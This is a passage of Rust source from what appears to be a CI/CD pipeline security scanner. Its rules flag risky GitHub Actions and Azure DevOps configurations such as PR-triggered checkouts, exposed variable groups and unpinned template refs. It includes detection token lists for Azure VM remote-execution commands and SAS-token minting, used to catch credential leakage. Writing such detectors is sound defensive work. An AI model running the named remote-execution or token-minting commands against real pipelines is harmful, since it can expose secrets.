973            "Circular delegation detected — workflow calls itself transitively, creating unbounded privilege escalation paths"
974                .into(),
975        recommendation: Recommendation::Manual {
976            action: "Break the delegation cycle — a workflow must not directly or transitively call itself".into(),
977        },
978        source: FindingSource::BuiltIn,
979        extras: FindingExtras::default(),
980}]
981}
982
983/// Rule: privileged workflow (OIDC/federated identity) with no provenance attestation step.
984///
985/// Scoped to workflows that actually use OIDC/federated identity (an Identity node with
986/// `META_OIDC = "true"` is present). If no node in the graph has `META_ATTESTS = "true"`,
987/// emit one Info-severity finding listing the steps with HasAccessTo an OIDC identity.
988pub fn uplift_without_attestation(graph: &AuthorityGraph) -> Vec<Finding> {
989    // Scope: only fire when the graph has at least one OIDC-capable Identity
990    let oidc_identity_ids: Vec<NodeId> = graph
991        .nodes_of_kind(NodeKind::Identity)
992        .filter(|n| {
993            n.metadata
994                .get(META_OIDC)
995                .map(|v| v == "true")
996                .unwrap_or(false)
997        })
998        .map(|n| n.id)
999        .collect();
1000
1001    if oidc_identity_ids.is_empty() {
1002        return Vec::new();
1003    }
1004
1005    // Bail if any node already has META_ATTESTS = true
1006    let has_attestation = graph.nodes.iter().any(|n| {
1007        n.metadata
1008            .get(META_ATTESTS)
1009            .map(|v| v == "true")
1010            .unwrap_or(false)
1011    });
1012    if has_attestation {
1013        return Vec::new();
1014    }
1015
1016    // Collect steps that have HasAccessTo an OIDC identity
1017    let mut steps_using_oidc: Vec<NodeId> = Vec::new();
1018    for edge in &graph.edges {
1019        if edge.kind != EdgeKind::HasAccessTo {
1020            continue;
1021        }
1022        if oidc_identity_ids.contains(&edge.to) && !steps_using_oidc.contains(&edge.from) {
1023            steps_using_oidc.push(edge.from);
1024        }
1025    }
1026
1027    if steps_using_oidc.is_empty() {
1028        return Vec::new();
1029    }
1030
1031    let n = steps_using_oidc.len();
1032    let mut nodes_involved = steps_using_oidc.clone();
1033    nodes_involved.extend(oidc_identity_ids);
1034
1035    vec![Finding {
1036        severity: Severity::Info,
1037        category: FindingCategory::UpliftWithoutAttestation,
1038        path: None,
1039        nodes_involved,
1040        message: format!(
1041            "{n} step(s) use OIDC/federated identity but no provenance attestation step was detected — artifact integrity cannot be verified"
1042        ),
1043        recommendation: Recommendation::Manual {
1044            action: "Add 'actions/attest-build-provenance' after your build step (GHA) to provide SLSA provenance. See https://docs.github.com/en/actions/security-guides/using-artifact-attestations".into(),
1045        },
1046        source: FindingSource::BuiltIn,
1047        extras: FindingExtras::default(),
1048}]
1049}
1050
1051/// Rule: step writes to the environment gate ($GITHUB_ENV / ##vso[task.setvariable]).
1052///
1053/// Authority leaking through the environment gate propagates to subsequent steps
1054/// outside the explicit graph edges. Severity:
1055/// - Untrusted step: Critical (attacker-controlled values inject into pipeline env)
1056/// - Step with secret/identity access: High (secrets may leak into env)
1057/// - Otherwise: Medium (still a propagation risk)
1058pub fn self_mutating_pipeline(graph: &AuthorityGraph) -> Vec<Finding> {
1059    let mut findings = Vec::new();
1060
1061    for step in graph.nodes_of_kind(NodeKind::Step) {
1062        let writes_gate = step
1063            .metadata
1064            .get(META_WRITES_ENV_GATE)
1065            .map(|v| v == "true")
1066            .unwrap_or(false);
1067        if !writes_gate {
1068            continue;
1069        }
1070
1071        // Collect authority targets the step has HasAccessTo
1072        let authority_nodes: Vec<&_> = graph
1073            .edges_from(step.id)
1074            .filter(|e| e.kind == EdgeKind::HasAccessTo)
1075            .filter_map(|e| graph.node(e.to))
1076            .filter(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
1077            .collect();
1078
1079        let is_untrusted = step.trust_zone == TrustZone::Untrusted;
1080        let has_authority = !authority_nodes.is_empty();
1081
1082        let severity = if is_untrusted {
1083            Severity::Critical
1084        } else if has_authority {
1085            Severity::High
1086        } else {
1087            Severity::Medium
1088        };
1089
1090        let mut nodes_involved = vec![step.id];
1091        nodes_involved.extend(authority_nodes.iter().map(|n| n.id));
1092
1093        let message = if is_untrusted {
1094            format!(
1095                "Untrusted step '{}' writes to the environment gate — attacker-controlled values can inject into subsequent steps' environment",
1096                step.name
1097            )
1098        } else if has_authority {
1099            let authority_label: Vec<String> =
1100                authority_nodes.iter().map(|n| n.name.clone()).collect();
1101            format!(
1102                "Step '{}' writes to the environment gate while holding authority ({}) — secrets may leak into pipeline environment",
1103                step.name,
1104                authority_label.join(", ")
1105            )
1106        } else {
1107            format!(
1108                "Step '{}' writes to the environment gate — values can propagate into subsequent steps' environment",
1109                step.name
1110            )
1111        };
1112
1113        findings.push(Finding {
1114            severity,
1115            category: FindingCategory::SelfMutatingPipeline,
1116            path: None,
1117            nodes_involved,
1118            message,
1119            recommendation: Recommendation::Manual {
1120                action: "Avoid writing secrets or attacker-controlled values to $GITHUB_ENV / $GITHUB_PATH / pipeline variables. Use explicit step outputs with narrow scoping instead.".into(),
1121            },
1122            source: FindingSource::BuiltIn,
1123                extras: FindingExtras::default(),
1124});
1125    }
1126
1127    findings
1128}
1129
1130/// Rule: PR-triggered pipeline performs a self checkout.
1131///
1132/// When a PR/PRT-triggered pipeline checks out the repository, attacker-controlled
1133/// code from the fork lands on the runner. Any subsequent step that reads workspace
1134/// files (which is almost all of them) can exfiltrate secrets or tamper with build
1135/// artifacts. Fires only when the graph has a PR-class trigger.
1136pub fn checkout_self_pr_exposure(graph: &AuthorityGraph) -> Vec<Finding> {
1137    // Only fires when the graph has a PR/PRT trigger
1138    let trigger = graph.metadata.get(META_TRIGGER).map(|s| s.as_str());
1139    let is_pr_context = matches!(trigger, Some("pr") | Some("pull_request_target"));
1140    if !is_pr_context {
1141        return vec![];
1142    }
1143
1144    let mut findings = Vec::new();
1145    for step in graph.nodes_of_kind(NodeKind::Step) {
1146        let is_checkout_self = step
1147            .metadata
1148            .get(META_CHECKOUT_SELF)
1149            .map(|v| v == "true")
1150            .unwrap_or(false);
1151        if !is_checkout_self {
1152            continue;
1153        }
1154        findings.push(Finding {
1155            category: FindingCategory::CheckoutSelfPrExposure,
1156            severity: Severity::High,
1157            message: format!(
1158                "PR-triggered pipeline checks out the repository at step '{}' — \
1159                 attacker-controlled code from the fork lands on the runner and is \
1160                 readable by all subsequent steps",
1161                step.name
1162            ),
1163            path: None,
1164            nodes_involved: vec![step.id],
1165            recommendation: Recommendation::Manual {
1166                action: "Use `persist-credentials: false` and avoid reading workspace \
1167                         files in subsequent privileged steps. Consider `checkout: none` \
1168                         for jobs that only need pipeline config, not source code."
1169                    .into(),
1170            },
1171            source: FindingSource::BuiltIn,
1172            // Splitting privileged from PR-checkout jobs is a meaningful
1173            // restructure — Medium effort.
1174            extras: FindingExtras {
1175                time_to_fix: Some(crate::finding::FixEffort::Medium),
1176                ..FindingExtras::default()
1177            },
1178        });
1179    }
1180    findings
1181}
1182
1183/// Rule: ADO variable group consumed by a PR-triggered job.
1184///
1185/// Variable groups hold secrets scoped to pipelines. When a PR-triggered job has
1186/// `HasAccessTo` a Secret/Identity carrying `META_VARIABLE_GROUP = "true"`, those
1187/// secrets cross into an untrusted-contributor execution context.
1188pub fn variable_group_in_pr_job(graph: &AuthorityGraph) -> Vec<Finding> {
1189    // Only fires when the pipeline has a PR trigger
1190    let trigger = graph
1191        .metadata
1192        .get(META_TRIGGER)
1193        .map(|s| s.as_str())
1194        .unwrap_or("");
1195    if trigger != "pull_request_target" && trigger != "pr" {
1196        return Vec::new();
1197    }
1198
1199    let mut findings = Vec::new();
1200
1201    for step in graph.nodes_of_kind(NodeKind::Step) {
1202        let accessed_var_groups: Vec<&_> = graph
1203            .edges_from(step.id)
1204            .filter(|e| e.kind == EdgeKind::HasAccessTo)
1205            .filter_map(|e| graph.node(e.to))
1206            .filter(|n| {
1207                (n.kind == NodeKind::Secret || n.kind == NodeKind::Identity)
1208                    && n.metadata
1209                        .get(META_VARIABLE_GROUP)
1210                        .map(|v| v == "true")
1211                        .unwrap_or(false)
1212            })
1213            .collect();
1214
1215        if !accessed_var_groups.is_empty() {
1216            let group_names: Vec<_> = accessed_var_groups
1217                .iter()
1218                .map(|n| n.name.as_str())
1219                .collect();
1220            findings.push(Finding {
1221                severity: Severity::Critical,
1222                category: FindingCategory::VariableGroupInPrJob,
1223                path: None,
1224                nodes_involved: std::iter::once(step.id)
1225                    .chain(accessed_var_groups.iter().map(|n| n.id))
1226                    .collect(),
1227                message: format!(
1228                    "PR-triggered step '{}' accesses variable group(s) [{}] — secrets cross into untrusted PR execution context",
1229                    step.name,
1230                    group_names.join(", ")
1231                ),
1232                recommendation: Recommendation::CellosRemediation {
1233                    reason: format!(
1234                        "PR-triggered step '{}' can exfiltrate variable group secrets via untrusted code",
1235                        step.name
1236                    ),
1237                    spec_hint: "cellos run --network deny-all --policy requireEgressDeclared,requireRuntimeSecretDelivery".into(),
1238                },
1239                source: FindingSource::BuiltIn,
1240                        extras: FindingExtras::default(),
1241});
1242        }
1243    }
1244
1245    findings
1246}
1247
1248/// Rule: self-hosted agent pool used by a PR-triggered pipeline that also checks out the repo.
1249///
1250/// All three factors present — self-hosted pool + PR trigger + `checkout:self` — combine to
1251/// allow an attacker to land malicious git hooks on the shared runner via a PR. Those hooks
1252/// persist across pipeline runs and execute with full pipeline authority.
1253pub fn self_hosted_pool_pr_hijack(graph: &AuthorityGraph) -> Vec<Finding> {
1254    let trigger = graph
1255        .metadata
1256        .get(META_TRIGGER)
1257        .map(|s| s.as_str())
1258        .unwrap_or("");
1259    if trigger != "pull_request_target" && trigger != "pr" {
1260        return Vec::new();
1261    }
1262
1263    // Check if any Image node is self-hosted
1264    let has_self_hosted_pool = graph.nodes_of_kind(NodeKind::Image).any(|n| {
1265        n.metadata
1266            .get(META_SELF_HOSTED)
1267            .map(|v| v == "true")
1268            .unwrap_or(false)
1269    });
1270
1271    if !has_self_hosted_pool {
1272        return Vec::new();
1273    }
1274
1275    // Check if any Step does checkout:self
1276    let checkout_steps: Vec<&_> = graph
1277        .nodes_of_kind(NodeKind::Step)
1278        .filter(|n| {
1279            n.metadata
1280                .get(META_CHECKOUT_SELF)
1281                .map(|v| v == "true")
1282                .unwrap_or(false)
1283        })
1284        .collect();
1285
1286    if checkout_steps.is_empty() {
1287        return Vec::new();
1288    }
1289
1290    // All three factors present: self-hosted + PR trigger + checkout:self.
1291    // Collect self-hosted pool nodes for the finding.
1292    let pool_nodes: Vec<&_> = graph
1293        .nodes_of_kind(NodeKind::Image)
1294        .filter(|n| {
1295            n.metadata
1296                .get(META_SELF_HOSTED)
1297                .map(|v| v == "true")
1298                .unwrap_or(false)
1299        })
1300        .collect();
1301
1302    let mut nodes_involved: Vec<NodeId> = pool_nodes.iter().map(|n| n.id).collect();
1303    nodes_involved.extend(checkout_steps.iter().map(|n| n.id));
1304
1305    vec![Finding {
1306        severity: Severity::Critical,
1307        category: FindingCategory::SelfHostedPoolPrHijack,
1308        path: None,
1309        nodes_involved,
1310        message:
1311            "PR-triggered pipeline uses self-hosted agent pool with checkout:self — enables git hook injection persisting across pipeline runs on the shared runner"
1312                .into(),
1313        recommendation: Recommendation::Manual {
1314            action: "Run PR pipelines on Microsoft-hosted (ephemeral) agents, or disable checkout:self for PR-triggered jobs on self-hosted pools".into(),
1315        },
1316        source: FindingSource::BuiltIn,
1317        extras: FindingExtras::default(),
1318}]
1319}
1320
1321// ── shared_self_hosted_pool_no_isolation ──────────────────────────────────────
1322//
1323// ADO self-hosted agent pools retain their workspace between pipeline runs.
1324// Without `workspace: { clean: all }` a build that runs on the shared agent
1325// can leave behind malicious files, compiled artefacts, or git hooks that
1326// persist for the next run — which may be a privileged deployment pipeline.
1327//
1328// Microsoft-hosted agents are ephemeral (Image node has no META_SELF_HOSTED).
1329
1330/// Rule G1: ADO self-hosted pool without workspace isolation.
1331///
1332/// Fires when any Image node (pool) in an ADO pipeline has `META_SELF_HOSTED`
1333/// set but does NOT have `META_WORKSPACE_CLEAN` set.  Microsoft-hosted pools
1334/// are ephemeral and are never flagged.
1335pub fn shared_self_hosted_pool_no_isolation(graph: &AuthorityGraph) -> Vec<Finding> {
1336    let platform = graph.metadata.get(META_PLATFORM).map(|s| s.as_str());
1337    if platform != Some("azure-devops") {
1338        return Vec::new();
1339    }
1340
1341    let mut findings = Vec::new();
1342
1343    for pool in graph.nodes_of_kind(NodeKind::Image) {
1344        let is_self_hosted = pool
1345            .metadata
1346            .get(META_SELF_HOSTED)
1347            .map(|v| v == "true")
1348            .unwrap_or(false);
1349
1350        if !is_self_hosted {
1351            continue;
1352        }
1353
1354        let has_clean = pool
1355            .metadata
1356            .get(META_WORKSPACE_CLEAN)
1357            .map(|v| v == "true")
1358            .unwrap_or(false);
1359
1360        if has_clean {
1361            continue;
1362        }
1363
1364        findings.push(Finding {
1365            severity: Severity::High,
1366            category: FindingCategory::SharedSelfHostedPoolNoIsolation,
1367            path: None,
1368            nodes_involved: vec![pool.id],
1369            message: format!(
1370                "Self-hosted pool '{}' has no workspace isolation (workspace: {{clean: all/true}} not set); \
1371                a previous pipeline run can pollute the workspace for the next — including privileged deployment jobs",
1372                pool.name
1373            ),
1374            recommendation: Recommendation::Manual {
1375                action: "Add `workspace: { clean: all }` to every job that uses a self-hosted pool, \
1376                    or migrate to Microsoft-hosted (ephemeral) agents for untrusted builds.".into(),
1377            },
1378            source: FindingSource::BuiltIn,
1379            extras: FindingExtras::default(),
1380        });
1381    }
1382
1383    findings
1384}
1385
1386/// Rule: ADO service connection with broad/unknown scope and no OIDC federation,
1387/// reachable from a PR-triggered job.
1388///
1389/// Static credentials backing broad-scope service connections can carry
1390/// subscription-wide Azure RBAC. When a PR-triggered step has `HasAccessTo` one of
1391/// these, PR-author-controlled code can move laterally into the Azure tenant.
1392pub fn service_connection_scope_mismatch(graph: &AuthorityGraph) -> Vec<Finding> {
1393    let trigger = graph
1394        .metadata
1395        .get(META_TRIGGER)
1396        .map(|s| s.as_str())
1397        .unwrap_or("");
1398    if trigger != "pull_request_target" && trigger != "pr" {
1399        return Vec::new();
1400    }
1401
1402    let mut findings = Vec::new();
1403
1404    for step in graph.nodes_of_kind(NodeKind::Step) {
1405        let broad_scs: Vec<&_> = graph
1406            .edges_from(step.id)
1407            .filter(|e| e.kind == EdgeKind::HasAccessTo)
1408            .filter_map(|e| graph.node(e.to))
1409            .filter(|n| {
1410                n.kind == NodeKind::Identity
1411                    && n.metadata
1412                        .get(META_SERVICE_CONNECTION)
1413                        .map(|v| v == "true")
1414                        .unwrap_or(false)
1415                    && n.metadata
1416                        .get(META_OIDC)
1417                        .map(|v| v != "true")
1418                        .unwrap_or(true) // not OIDC-federated
1419                    && matches!(
1420                        n.metadata.get(META_IDENTITY_SCOPE).map(|s| s.as_str()),
1421                        Some("broad") | Some("Broad") | None // unknown scope is also a risk
1422                    )
1423            })
1424            .collect();
1425
1426        for sc in &broad_scs {
1427            findings.push(Finding {
1428                severity: Severity::High,
1429                category: FindingCategory::ServiceConnectionScopeMismatch,
1430                path: None,
1431                nodes_involved: vec![step.id, sc.id],
1432                message: format!(
1433                    "PR-triggered step '{}' accesses service connection '{}' with broad/unknown scope and no OIDC federation — static credential may have subscription-wide Azure RBAC",
1434                    step.name, sc.name
1435                ),
1436                recommendation: Recommendation::CellosRemediation {
1437                    reason: "Broad-scope service connection reachable from PR code — CellOS egress isolation limits lateral movement even when connection cannot be immediately rescoped".into(),
1438                    spec_hint: "cellos run --network deny-all --policy requireEgressDeclared".into(),
1439                },
1440                source: FindingSource::BuiltIn,
1441                        extras: FindingExtras::default(),
1442});
1443        }
1444    }
1445
1446    findings
1447}
1448
1449/// ADO-only rule: a `resources.repositories[]` entry resolves against a
1450/// mutable target — no `ref:` field (default branch) or `refs/heads/<x>`
1451/// without a SHA. Whoever owns that branch can inject steps into every
1452/// consuming pipeline at the next run.
1453///
1454/// Pinned forms that do NOT fire:
1455///   - `refs/tags/<x>` — git tags (treated as immutable in practice)
1456///   - bare 40-char hex SHA — explicit commit pin
1457///   - `refs/heads/<sha>` where the trailing segment is a 40-char hex SHA
1458///
1459/// Mutable forms that DO fire:
1460///   - field absent — defaults to the repo's default branch
1461///   - `refs/heads/<branch>` with a normal branch name
1462///   - bare branch name (`main`, `master`, `develop`, ...)
1463///
1464/// Suppression: a repository entry declared with NO `ref:` field AND no
1465/// in-file consumer (`extends:`, `template: x@alias`, or `checkout: alias`)
1466/// is skipped. This catches purely vestigial declarations — a leftover
1467/// `resources.repositories[]` entry that no one references is not an active
1468/// attack surface. An entry with an explicit `ref: refs/heads/<x>` always
1469/// fires regardless of in-file usage, because the explicit branch ref
1470/// signals an intent to consume (the consumer is typically in an included
1471/// template file outside the per-file scan boundary).
1472pub fn template_extends_unpinned_branch(graph: &AuthorityGraph) -> Vec<Finding> {
1473    let raw = match graph.metadata.get(META_REPOSITORIES) {
1474        Some(s) => s,
1475        None => return Vec::new(),
1476    };
1477    let entries: Vec<serde_json::Value> = match serde_json::from_str(raw) {
1478        Ok(v) => v,
1479        Err(_) => return Vec::new(),
1480    };
1481
1482    let mut findings = Vec::new();
1483    for entry in entries {
1484        let alias = match entry.get("alias").and_then(|v| v.as_str()) {
1485            Some(a) => a,
1486            None => continue,
1487        };
1488        let name = entry.get("name").and_then(|v| v.as_str()).unwrap_or(alias);
1489        let repo_type = entry
1490            .get("repo_type")
1491            .and_then(|v| v.as_str())
1492            .unwrap_or("git");
1493        let ref_value = entry.get("ref").and_then(|v| v.as_str());
1494        let used = entry.get("used").and_then(|v| v.as_bool()).unwrap_or(false);
1495
1496        let classification = classify_repository_ref(ref_value);
1497        let resolved = match classification {
1498            RepositoryRefClass::Pinned => continue,
1499            RepositoryRefClass::DefaultBranch => {
1500                // Default-branch entries are only flagged when an in-file
1501                // consumer actually references the alias. Without an explicit
1502                // `ref:` and without a consumer there's no evidence the
1503                // declaration is active — likely vestigial.
1504                if !used {
1505                    continue;
1506                }
1507                "default branch (no ref:)".to_string()
1508            }
1509            RepositoryRefClass::MutableBranch(b) => format!("mutable branch '{b}'"),
1510        };
1511
1512        let pinned_example = format!("ref: <40-char-sha>  # commit on {name}");
1513        findings.push(Finding {
1514            severity: Severity::High,
1515            category: FindingCategory::TemplateExtendsUnpinnedBranch,
1516            path: None,
1517            nodes_involved: Vec::new(),
1518            message: format!(
1519                "ADO resources.repositories alias '{alias}' (type: {repo_type}, name: {name}) resolves to {resolved} — \
1520                 whoever owns that branch can inject steps at the next pipeline run"
1521            ),
1522            recommendation: Recommendation::PinAction {
1523                current: ref_value.unwrap_or("(default branch)").to_string(),
1524                pinned: pinned_example,
1525            },
1526            source: FindingSource::BuiltIn,
1527                extras: FindingExtras::default(),
1528});
1529    }
1530
1531    findings
1532}
1533
1534/// ADO-only rule: a `resources.repositories[]` entry pins to a *feature-class*
1535/// branch — anything outside the platform-blessed set
1536/// (`main`, `master`, `release/*`, `hotfix/*`).
1537///
1538/// Strictly stronger signal than [`template_extends_unpinned_branch`]:
1539///
1540/// * `template_extends_unpinned_branch` fires on *any* mutable branch ref
1541///   (including `main` and `master`) — the abstract "ref isn't pinned to a
1542///   SHA or tag" finding.
1543/// * This rule fires only on the subset that's *worse than main*: a developer
1544///   feature branch (`feature/*`, `topic/*`, `dev/*`, `wip/*`, `users/*`,
1545///   `develop`, …) where push protection is typically weaker than the trunk.
1546///
1547/// The two findings co-fire intentionally — they describe different angles of
1548/// the same risk class. `template_extends_unpinned_branch` says "this isn't
1549/// pinned"; this rule adds "and the branch it points to is one any developer
1550/// can push to without a code review gate".
1551///
1552/// Detection inputs are identical to `template_extends_unpinned_branch`:
1553/// `META_REPOSITORIES` JSON array, with the same `used` suppression for
1554/// `ref`-absent entries.
1555///
1556/// Pinned forms (40-char SHA, `refs/tags/<x>`, `refs/heads/<sha>`) do not
1557/// fire — same classification helper as the parent rule.
1558///
1559/// Default-branch (no-`ref:`) entries do not fire from this rule. The default
1560/// branch is conventionally `main`/`master`, and even when it's something
1561/// else the *implicit* default-branch contract carries less risk than an
1562/// explicit feature-branch pin (the default branch usually has the strongest
1563/// protection in the org). The plain "this isn't pinned" surface is left to
1564/// `template_extends_unpinned_branch`.
1565pub fn template_repo_ref_is_feature_branch(graph: &AuthorityGraph) -> Vec<Finding> {
1566    let raw = match graph.metadata.get(META_REPOSITORIES) {
1567        Some(s) => s,
1568        None => return Vec::new(),
1569    };
1570    let entries: Vec<serde_json::Value> = match serde_json::from_str(raw) {
1571        Ok(v) => v,
1572        Err(_) => return Vec::new(),
1573    };
1574
1575    let mut findings = Vec::new();
1576    for entry in entries {
1577        let alias = match entry.get("alias").and_then(|v| v.as_str()) {
1578            Some(a) => a,
1579            None => continue,
1580        };
1581        let name = entry.get("name").and_then(|v| v.as_str()).unwrap_or(alias);
1582        let repo_type = entry
1583            .get("repo_type")
1584            .and_then(|v| v.as_str())
1585            .unwrap_or("git");
1586        let ref_value = entry.get("ref").and_then(|v| v.as_str());
1587
1588        // Only explicit refs are candidates here — the parent rule covers the
1589        // ref-absent case via the default-branch path.
1590        let branch = match classify_repository_ref(ref_value) {
1591            RepositoryRefClass::MutableBranch(b) => b,
1592            RepositoryRefClass::Pinned | RepositoryRefClass::DefaultBranch => continue,
1593        };
1594
1595        if !is_feature_class_branch(&branch) {
1596            continue;
1597        }
1598
1599        let pinned_example = format!("ref: <40-char-sha>  # commit on {name}");
1600        findings.push(Finding {
1601            severity: Severity::High,
1602            category: FindingCategory::TemplateRepoRefIsFeatureBranch,
1603            path: None,
1604            nodes_involved: Vec::new(),
1605            message: format!(
1606                "ADO resources.repositories alias '{alias}' (type: {repo_type}, name: {name}) is pinned to feature-class branch '{branch}' — \
1607                 weaker than even an unpinned trunk pin: any developer with write access to that branch can inject pipeline steps without a code review on main"
1608            ),
1609            recommendation: Recommendation::PinAction {
1610                current: ref_value.unwrap_or("(default branch)").to_string(),
1611                pinned: pinned_example,
1612            },
1613            source: FindingSource::BuiltIn,
1614                extras: FindingExtras::default(),
1615});
1616    }
1617
1618    findings
1619}
1620
/// Decides whether an ADO branch name falls *outside* the platform-blessed
/// trunk/release set, i.e. whether it is a "feature-class" branch.
///
/// Blessed (returns `false`):
///
///   - `main`, `master`
///   - `release`, `release/*`, `releases`, `releases/*`
///   - `hotfix`, `hotfix/*`, `hotfixes`, `hotfixes/*`
///
/// Anything else — `feature/*`, `topic/*`, `dev/*`, `wip/*`, `users/*`,
/// `develop`, ad-hoc names — returns `true`. An empty (or whitespace-only)
/// name returns `false`.
///
/// The input is trimmed, any leading `refs/heads/` is removed, and the
/// remainder is compared ASCII-case-insensitively, so the helper can be
/// exercised on raw ref strings as well as pre-stripped branch names.
fn is_feature_class_branch(branch: &str) -> bool {
    const TRUNK_NAMES: &[&str] = &["main", "master"];
    const BLESSED_FAMILIES: &[&str] = &["release", "releases", "hotfix", "hotfixes"];

    let name = branch
        .trim()
        .trim_start_matches("refs/heads/")
        .to_ascii_lowercase();

    if name.is_empty() || TRUNK_NAMES.contains(&name.as_str()) {
        return false;
    }

    // A blessed family matches either as the whole name (`release`) or as a
    // path prefix (`release/...`); `releasex` is NOT blessed.
    let blessed = BLESSED_FAMILIES
        .iter()
        .any(|family| match name.strip_prefix(*family) {
            Some(rest) => rest.is_empty() || rest.starts_with('/'),
            None => false,
        });

    !blessed
}
1659
1660// ── Command-line credential leakage helpers ─────────────
1661//
1662// These two rules (`vm_remote_exec_via_pipeline_secret`,
1663// `short_lived_sas_in_command_line`) inspect inline script bodies stamped on
1664// Step nodes by the parser as `META_SCRIPT_BODY`. They are intentionally
1665// heuristic — the goal is reliable detection of the corpus pattern, not 100%
1666// false-positive cleanliness. They're allowed to co-fire on the same step:
1667// each describes a different angle of the same risk class.
1668
/// Names of the Azure VM remote-execution primitives we care about.
///
/// Entries are stored lowercase and are matched as plain substrings against
/// an already-lowercased script body, which is what makes the match
/// case-insensitive. Order matters for reporting: the rule message names the
/// first entry in this list that occurs in the body.
const VM_REMOTE_EXEC_TOKENS: &[&str] = &[
    "set-azvmextension",
    "invoke-azvmruncommand",
    "az vm run-command",
    "az vm extension set",
];
1677
/// Substrings that indicate a SAS token has just been minted in this script.
///
/// Covers the Az PowerShell cmdlets and the `az storage ... generate-sas`
/// CLI forms for container, blob and account scope. Entries are lowercase
/// and are matched as plain substrings against a lowercased script body
/// (or a lowercased assignment right-hand side), so matching is
/// case-insensitive.
const SAS_MINT_TOKENS: &[&str] = &[
    "new-azstoragecontainersastoken",
    "new-azstorageblobsastoken",
    "new-azstorageaccountsastoken",
    "az storage container generate-sas",
    "az storage blob generate-sas",
    "az storage account generate-sas",
];
1688
/// Argument-passing keywords that put a value on the process command line and
/// thus into ARM extension status / OS process logs.
///
/// Entries are lowercase and are matched as plain substrings against a
/// lowercased script body; presence anywhere in the body counts as a sink.
const COMMAND_LINE_SINK_TOKENS: &[&str] = &[
    "commandtoexecute",
    "scriptarguments",
    "--arguments",
    "-argumentlist",
    "--scripts",
    "-scriptstring",
];
1699
1700/// Returns the names of pipeline secret/SAS variables (`$(NAME)`) that the
1701/// step references via `HasAccessTo` a Secret. Used to spot interpolation of
1702/// pipeline secrets into command-line strings.
1703fn step_secret_var_names(graph: &AuthorityGraph, step_id: NodeId) -> Vec<&str> {
1704    graph
1705        .edges_from(step_id)
1706        .filter(|e| e.kind == EdgeKind::HasAccessTo)
1707        .filter_map(|e| graph.node(e.to))
1708        .filter(|n| n.kind == NodeKind::Secret)
1709        .map(|n| n.name.as_str())
1710        .collect()
1711}
1712
1713/// Returns the names of all Secret nodes a step has `HasAccessTo`.
1714/// Used by the script-aware ADO rules to constrain pattern matches to
1715/// `$(VAR)` references that actually resolve to secrets in this graph.
1716fn step_secret_names(graph: &AuthorityGraph, step_id: NodeId) -> Vec<String> {
1717    graph
1718        .edges_from(step_id)
1719        .filter(|e| e.kind == EdgeKind::HasAccessTo)
1720        .filter_map(|e| graph.node(e.to))
1721        .filter(|n| n.kind == NodeKind::Secret)
1722        .map(|n| n.name.clone())
1723        .collect()
1724}
1725
/// Heuristic check for whether the variable `var_name` is referenced inside
/// `script_body`. Matching is case-insensitive (both sides are lowercased).
///
/// Two reference forms are recognised:
///   - the ADO macro form `$(var)`;
///   - the PowerShell form `$var` (which also covers `"$var"` and
///     `` `"$var`" ``), provided the character right after the name is not an
///     identifier character — so `$varSomething` does not count as `$var`.
///
/// An empty `var_name` never matches.
fn body_interpolates_var(script_body: &str, var_name: &str) -> bool {
    if var_name.is_empty() {
        return false;
    }

    let haystack = script_body.to_lowercase();
    let lowered_name = var_name.to_lowercase();

    // ADO macro form.
    if haystack.contains(&format!("$({lowered_name})")) {
        return true;
    }

    // PowerShell form: accept the first occurrence that ends at a word
    // boundary (end of input or a non-identifier byte).
    let ps_reference = format!("${lowered_name}");
    haystack
        .match_indices(ps_reference.as_str())
        .any(|(start, hit)| match haystack.as_bytes().get(start + hit.len()) {
            Some(&following) => !(following.is_ascii_alphanumeric() || following == b'_'),
            None => true,
        })
}
1756
1757/// Returns true if `script` contains `$(secret)` and that occurrence sits on
1758/// a line whose left-hand side looks like a shell-variable assignment:
1759///   - `export FOO=$(SECRET)`
1760///   - `FOO="$(SECRET)"`
1761///   - `$X = "$(SECRET)"` / `$env:X = "$(SECRET)"`
1762///   - `set -a` followed by an assignment is a softer signal but still flagged
1763///
1764/// Returns false when `$(secret)` is part of a command-line argument
1765/// (e.g. `terraform plan -var "k=$(SECRET)"`) — that's covered by other rules.
1766fn script_assigns_secret_to_shell_var(script: &str, secret: &str) -> bool {
1767    let needle = format!("$({secret})");
1768    for line in script.lines() {
1769        if !line.contains(&needle) {
1770            continue;
1771        }
1772        // Strip everything from `$(secret)` rightward — we only inspect what
1773        // comes before it on this line.
1774        let lhs = match line.find(&needle) {
1775            Some(pos) => &line[..pos],
1776            None => continue,
1777        };
1778        let trimmed = lhs.trim_start();
1779
1780        // bash/sh: `export VAR=`, `VAR=`, `set VAR=`, `declare VAR=`
1781        // Look for `<word>=` (no space allowed before `=`) and no leading
1782        // command pipe / non-assignment indicator.
1783        if matches_bash_assignment(trimmed) {
1784            return true;
1785        }
1786
1787        // PowerShell: `$VAR = "..."`, `$env:VAR = "..."`, `${VAR} = "..."`,
1788        // `Set-Variable -Name X -Value "$(SECRET)"`.
1789        if matches_powershell_assignment(trimmed) {
1790            return true;
1791        }
1792    }
1793    false
1794}
1795
1796/// Returns true if `body` contains any of the SAS-mint token substrings.
1797fn body_mints_sas(body_lower: &str) -> bool {
1798    SAS_MINT_TOKENS.iter().any(|t| body_lower.contains(t))
1799}
1800
1801/// Returns true if `body` contains any of the VM remote-exec tool substrings.
1802fn body_uses_vm_remote_exec(body_lower: &str) -> bool {
1803    VM_REMOTE_EXEC_TOKENS.iter().any(|t| body_lower.contains(t))
1804}
1805
1806/// Returns true if `body` contains any command-line sink keyword.
1807fn body_has_cmdline_sink(body_lower: &str) -> bool {
1808    COMMAND_LINE_SINK_TOKENS
1809        .iter()
1810        .any(|t| body_lower.contains(t))
1811}
1812
1813/// Extract names of PowerShell variables that are bound to a SAS-mint result.
1814/// Pattern: `$<name> = New-AzStorage...SASToken ...` (case-insensitive).
1815/// Returns the variable names without the leading `$`.
1816fn powershell_sas_assignments(body: &str) -> Vec<String> {
1817    let mut out = Vec::new();
1818    let lower = body.to_lowercase();
1819    let bytes = lower.as_bytes();
1820    let mut i = 0usize;
1821    while i < bytes.len() {
1822        if bytes[i] != b'$' {
1823            i += 1;
1824            continue;
1825        }
1826        // Read identifier
1827        let name_start = i + 1;
1828        let mut j = name_start;
1829        while j < bytes.len() {
1830            let c = bytes[j];
1831            if c.is_ascii_alphanumeric() || c == b'_' {
1832                j += 1;
1833            } else {
1834                break;
1835            }
1836        }
1837        if j == name_start {
1838            i += 1;
1839            continue;
1840        }
1841        // Skip whitespace, then expect `=`
1842        let mut k = j;
